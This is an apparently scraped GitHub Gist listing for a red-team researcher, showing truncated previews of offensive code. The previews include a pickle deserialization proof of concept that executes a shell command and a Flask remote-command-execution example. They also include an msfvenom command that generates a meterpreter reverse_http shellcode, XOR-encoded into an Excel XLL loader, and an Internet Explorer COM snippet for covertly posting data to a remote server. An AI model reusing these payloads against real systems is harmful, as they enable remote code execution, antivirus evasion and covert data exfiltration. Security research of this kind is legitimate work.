moo_hax moohax

@moohax
moohax / collisionLSH.py
Created Aug 19, 2021 — forked from unrealwill/collisionLSH.py
Proof of Concept : generating collisions on a neural perceptual hash
View collisionLSH.py
import tensorflow as tf #We need tensorflow 2.x
import numpy as np
#The hashlength in bits
hashLength = 256
def buildModel():
    #we can set the seed to simulate the fact that this network is known and doesn't change between runs
    #tf.random.set_seed(42)
    model = tf.keras.Sequential()
View twitter.py
# Generated by counterfit #
import requests
import base64
from counterfit.core.targets import ArtTarget
class Twitter(ArtTarget):
    model_name = "twitter"
View vt_target.md

Workshop Commands and Functions

Getting Started

Requirements

  • An Internet Connection
  • Docker
  • VirusTotal Account (username and password)
  • The following headers, which can be gathered by examining the headers in Burp or DevTools.
    • X-Recaptcha-Response
View virustotal.py
# Generated by counterfit #
# code modified from https://github.com/monoxgas/FlyingAFalseFlag/blob/256197b78a8140d15df6e18b3221b637b5c3490a/Addendum/addendum.py
import os
import re
import json
import time
import requests
import numpy as np
import tqdm
@moohax
moohax / cereal_poc.py
Created Oct 19, 2020
Deserialization of custom class in pickle/numpy/PyTorch
View cereal_poc.py
# Create a class - normally this is a machine learning model saved to disk
class MLModel():
    def __reduce__(self):
        import os
        execution = 'cmd.exe /c calc.exe'
        return (os.popen, (execution,))
# Serialize it.
import pickle
payload = pickle.dumps(MLModel())
@moohax
moohax / cereal_web.py
Created Oct 19, 2020
Example of deserialization for command exec through pickle
View cereal_web.py
import pickle
import base64
import requests
from flask import Flask, request
app = Flask(__name__)
## Start the server and go to 127.0.0.1:5000/exec ##
View sandbox_detect.py
import keras
from keras import models
from keras import layers
from sklearn.preprocessing import StandardScaler, MinMaxScaler, LabelEncoder
import numpy as np
import keras.backend as K
# Main
np.random.seed(7)
network = models.Sequential()
View enclave.cpp
// enclave.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "Windows.h"
#include "Winbase.h"
#include "enclaveapi.h"
#include <iostream>
#pragma comment(lib, "Kernel32.lib")
View shellcode_multibyteXOR_ExcelRegisterXLL.c
// Compile with:
// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
// msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
// ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor
#include <Windows.h>
@moohax
moohax / ie_com.cs
Created Feb 13, 2018 — forked from leoloobeek/ie_com.cs
InternetExplorer.Application PoC's
View ie_com.cs
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
    Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
    object IE = Activator.CreateInstance(com_type);
    object[] falseArr = new object[] { false };
    object[] trueArr = new object[] { true };
    com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
    com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);